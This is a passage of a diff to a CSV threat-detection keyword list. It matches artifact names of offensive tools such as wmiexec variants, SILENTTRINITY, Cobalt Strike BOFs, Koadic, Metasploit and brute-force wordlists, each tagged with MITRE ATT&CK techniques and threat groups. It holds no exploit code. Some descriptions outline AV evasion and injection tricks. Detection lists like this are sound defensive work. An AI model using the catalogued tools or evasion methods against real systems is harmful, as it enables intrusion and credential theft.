This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*wmiexec2.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*wmiexec2-main*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*WMIExecHash.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*WMIExecHash.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","145","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - 
TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec-Pro.git*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*wmiexec-pro.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "*wmi-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMImplant*","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","767","152","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*WMIPersist.*","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","34","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" -"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*wmipersistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*WMIPersistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*WMIPersistImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMI-ProcessCreate.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" -"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*wmispawn select*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WmiSploit.git*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI 
service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WmiSploit-master/zip*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" 
-"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" -"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","362","77","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" 
+"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 